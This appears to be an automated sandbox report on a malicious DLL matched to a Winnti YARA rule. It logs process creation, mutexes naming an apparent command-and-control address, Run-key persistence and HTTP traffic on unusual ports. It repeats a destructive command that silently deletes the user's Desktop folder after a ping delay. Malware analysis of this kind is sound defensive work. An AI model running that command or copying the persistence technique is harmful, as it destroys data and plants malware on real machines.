Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75910000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76370000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 70400000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73C40000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73E00000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74130000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74350000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74DD0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75390000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75540000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 755A0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75930000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75A00000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75D80000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 764D0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 77100000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 776A0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003F63 ExitWindowsEx,7_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10003F63 ExitWindowsEx,11_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_10003F63 ExitWindowsEx,14_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B2247_2_1000B224
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B70D7_2_1000B70D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100121ED7_2_100121ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000AEC07_2_1000AEC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1000B22411_2_1000B224
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1000B70D11_2_1000B70D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100121ED11_2_100121ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1000AEC011_2_1000AEC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_1000B22414_2_1000B224
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_1000B70D14_2_1000B70D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_100121ED14_2_100121ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_1000AEC014_2_1000AEC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10001000 appears 913 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10009125 appears 39 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1000CD90 appears 38 times
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 672
Source: 4hSuRTwnWJ.dllBinary or memory string: OriginalFilenameLabel.Exej% vs 4hSuRTwnWJ.dll
Source: 4hSuRTwnWJ.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: 4hSuRTwnWJ.dll, type: SAMPLEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4hSuRTwnWJ.dllStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 4hSuRTwnWJ.dllStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engineClassification label: mal100.troj.evad.winDLL@37/12@2/6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000404F AdjustTokenPrivileges,7_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1000404F AdjustTokenPrivileges,11_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_1000404F AdjustTokenPrivileges,14_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003FB7 CreateToolhelp32Snapshot,7_2_10003FB7
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\Desktop\MZ Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8000
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\107.163.56.251:6658
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\M107.163.56.251:6658
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7716
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\08cfb3c1-c0f5-4aa0-82eb-962903fb88ceJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,InputFile
Source: 4hSuRTwnWJ.dllReversingLabs: Detection: 78%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,InputFile
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,PrintFile
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 672
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,WriteErrorLog
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",InputFile
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",PrintFile
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",WriteErrorLog
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8000 -s 676
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\4hSuRTwnWJ.dll",WriteErrorLog
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\4hSuRTwnWJ.dll",WriteErrorLog
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,InputFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,PrintFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,WriteErrorLogJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",InputFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",PrintFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",WriteErrorLogJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: mfc42.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: msvcp60.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Binary string: label.pdb source: 4hSuRTwnWJ.dll
Source: Binary string: c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 0000000B.00000003.2316321450.00000000068F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: rundll32.exe, 0000000B.00000003.2316425309.00000000068A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.**.* source: rundll32.exe, 0000000B.00000003.2726820415.00000000033C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.* source: rundll32.exe, 0000000B.00000003.2293758335.00000000033CA000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1002100E push dword ptr [esp+50h]; retn 0054h7_2_10039406
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001F00F push dword ptr [esp+54h]; retn 005Ch7_2_1001F10A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10027015 push dword ptr [esp+34h]; retn 0038h7_2_1002707F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1002501A push dword ptr [esp+0Ch]; retn 0010h7_2_1002503A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10021020 push dword ptr [esp+50h]; retn 0054h7_2_10021033
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10021036 push dword ptr [esp+2Ch]; retn 0030h7_2_10036610
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10033052 pushfd ; mov dword ptr [esp], DAC2B062h7_2_10033057
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10033052 push dword ptr [esp+50h]; retn 0054h7_2_1003306B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1002D050 pushfd ; mov dword ptr [esp], esi7_2_1002D05B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1002D050 push dword ptr [esp+50h]; retn 0054h7_2_1002D062
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10025054 push dword ptr [esp+44h]; retn 0048h7_2_1002506D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1003105A push dword ptr [esp+10h]; retn 0018h7_2_10031078
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10025054 push dword ptr [esp+44h]; retn 0048h7_2_1002506D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1002705E push dword ptr [esp+34h]; retn 0038h7_2_1002707F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10039062 push dword ptr [esp+38h]; retn 003Ch7_2_10032FD1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10027069 push dword ptr [esp+34h]; retn 0038h7_2_1002707F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1002B075 push dword ptr [esp+2Ch]; retn 0030h7_2_1002B0C7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1003107B push dword ptr [esp+50h]; retn 0054h7_2_1003109B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10027087 push dword ptr [esp+0Ch]; retn 0010h7_2_100270B6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1002F08A pushfd ; mov dword ptr [esp], 92CAD9F7h7_2_1002F0A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1002D09D push dword ptr [esp+30h]; retn 0034h7_2_1002D0B7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100230A7 push dword ptr [esp+08h]; retn 000Ch7_2_1002936A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100230AC push dword ptr [esp+54h]; retn 0058h7_2_100230BC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100370B4 push dword ptr [esp+34h]; retn 0038h7_2_100370EB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100210C8 push dword ptr [esp+58h]; retn 005Ch7_2_100321F3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100250CF push dword ptr [esp+14h]; retn 0018h7_2_10030851
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100210D2 push dword ptr [esp+3Ch]; retn 0040h7_2_1003052B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100250E3 push dword ptr [esp+40h]; retn 0044h7_2_10021A9B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100250E3 push dword ptr [esp+24h]; retn 0028h7_2_1002CDEC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001F0EA push dword ptr [esp+54h]; retn 005Ch7_2_1001F10A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100210E9 push dword ptr [esp+4Ch]; retn 0050h7_2_1002B266
Source: 4hSuRTwnWJ.dllStatic PE information: section name: .rsrc entropy: 7.221275945709022

Boot Survival

barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wflJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wflJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wflJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 18530
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 18530
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 18963
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
